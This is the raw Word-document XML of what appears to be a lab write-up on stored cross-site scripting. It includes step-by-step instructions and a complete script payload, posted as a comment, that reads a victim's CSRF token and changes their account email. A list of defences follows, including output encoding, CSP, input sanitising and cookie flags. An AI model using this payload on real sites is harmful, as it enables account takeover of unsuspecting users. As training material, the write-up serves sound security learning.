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47FDEAC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</w:t>
      </w:r>
      <w:r w:rsidR="00212AC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> as a simulated victim user views all comments after they are posted.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exploit the vulnerability to </w:t>
      </w:r>
      <w:r w:rsidR="00CB1CA7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>make the application change the target’s email address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48BF43A4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and open any post.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53241555" w14:textId="1AF96EB9" w:rsidR="008F76D3" w:rsidRPr="00A062A5" w:rsidRDefault="008F76D3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Post a comment with trash data but enter the payload into the comment box.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2AF10A" w14:textId="338563E2" w:rsidR="00FB7477" w:rsidRDefault="00A062A5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It will force the application to make </w:t>
      </w:r>
      <w:r w:rsidR="00CB1CA7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>the application to change the email address to the given address as soon as they open their comment page</w:t>
      </w:r>
      <w:r w:rsidR="00131AF3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7FD1D8EA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>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307B8A43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CA7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E73EC8F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req.onload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB1CA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handleResponse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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1046D09E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req.open</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB1CA7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>('get','/my-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account',true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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BDE663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req.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB1CA7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3C2528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handleResponse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CA7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6A240E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var token = </w:t>
      </w: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this.responseText.match</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB1CA7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>(/name="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csrf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" value="(\w+)"/)[1];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF61397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var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CA7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5A4DEA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changeReq.open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('post', '/my-account/change-email', true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056BDD7B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changeReq.send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csrf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='+token+'&amp;email=test@test.com')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161C7880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>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D57B78" w14:textId="5D477E8B" w:rsidR="009303B4" w:rsidRDefault="00CB1CA7" w:rsidP="00CB1C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B1CA7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E747A18" w14:textId="77777777" w:rsidR="0068628D" w:rsidRPr="0068628D" w:rsidRDefault="0068628D" w:rsidP="00686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8F034E" w14:textId="77777777" w:rsidR="00A642B3" w:rsidRDefault="00A642B3" w:rsidP="00686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EE0B27" w14:textId="77777777" w:rsidR="00A642B3" w:rsidRDefault="00A642B3" w:rsidP="00686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7CBEB6" w14:textId="2FB874E9" w:rsidR="0068628D" w:rsidRPr="0068628D" w:rsidRDefault="00A642B3" w:rsidP="00686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42B3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5ABD882E" wp14:editId="5269ED21">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>511810</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6645910" cy="1902460"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="178430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4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28D" w:rsidRPr="0068628D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DAD3DB4" w14:textId="0AEFE1DC" w:rsidR="0068628D" w:rsidRPr="0068628D" w:rsidRDefault="0068628D" w:rsidP="00686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A8DC1B3" w14:textId="77777777" w:rsidR="000C626E" w:rsidRPr="000C626E" w:rsidRDefault="000C626E" w:rsidP="000C6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C626E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Encode Data on Output:</w:t>
      </w:r>
      <w:r w:rsidRPr="000C626E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Always encode user-generated data before displaying it back to the user. By ensuring that characters like &lt;, &gt;, and &amp; are rendered as their HTML encoded equivalents (e.g., &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000C626E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0C626E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0C626E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0C626E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0C626E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>;, &amp;amp;), you prevent them from being interpreted as code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4CD496" w14:textId="77777777" w:rsidR="000C626E" w:rsidRPr="000C626E" w:rsidRDefault="000C626E" w:rsidP="000C6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C626E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0C626E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Implement a strict CSP that would prevent inline scripts from executing. This can block a considerable portion of XSS attacks, especially if unsafe-inline is disallowed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8428D4" w14:textId="77777777" w:rsidR="000C626E" w:rsidRPr="000C626E" w:rsidRDefault="000C626E" w:rsidP="000C6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C626E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Validate and Sanitize Input:</w:t>
      </w:r>
      <w:r w:rsidRPr="000C626E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ensure that all user inputs are strictly validated. Using a library that specifically focuses on sanitizing HTML can help eliminate potential malicious scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721F188A" w14:textId="77777777" w:rsidR="000C626E" w:rsidRPr="000C626E" w:rsidRDefault="000C626E" w:rsidP="000C6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C626E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Session Regeneration:</w:t>
      </w:r>
      <w:r w:rsidRPr="000C626E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Always regenerate session tokens after any critical activity. This means even if an attacker manages to steal a session token, they won't be able to use it for crucial operations like changing email addresses or passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E78AB9B" w14:textId="44C38FEC" w:rsidR="002F152E" w:rsidRPr="000C626E" w:rsidRDefault="000C626E" w:rsidP="00187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C626E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C626E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Secure Flags:</w:t>
      </w:r>
      <w:r w:rsidRPr="000C626E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Set the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C626E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C626E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag on cookies. This makes them inaccessible to JavaScript. It is also advisable to set the Secure flag to ensure the cookies are sent over HTTPS.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002F152E" w:rsidRPr="000C626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31F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="23A6F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2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1019623095">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="152180400">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1129974817">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="30894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87DD8"/>
    <w:rsid w:val="00093FF4"/>
    <w:rsid w:val="000C626E"/>
    <w:rsid w:val="000D5093"/>
    <w:rsid w:val="000D7CE5"/>
    <w:rsid w:val="000E4A5B"/>
    <w:rsid w:val="000F0291"/>
    <w:rsid w:val="000F4FE7"/>
    <w:rsid w:val="000F5F61"/>
    <w:rsid w:val="00115586"/>
    <w:rsid w:val="00131AF3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64E28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28D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1591"/>
    <w:rsid w:val="00A062A5"/>
    <w:rsid w:val="00A071F4"/>
    <w:rsid w:val="00A35B3A"/>
    <w:rsid w:val="00A44CF7"/>
    <w:rsid w:val="00A642B3"/>
    <w:rsid w:val="00A834AE"/>
    <w:rsid w:val="00A83ED9"/>
    <w:rsid w:val="00AA2AE9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2023-09-13T12:29:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-09T11:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>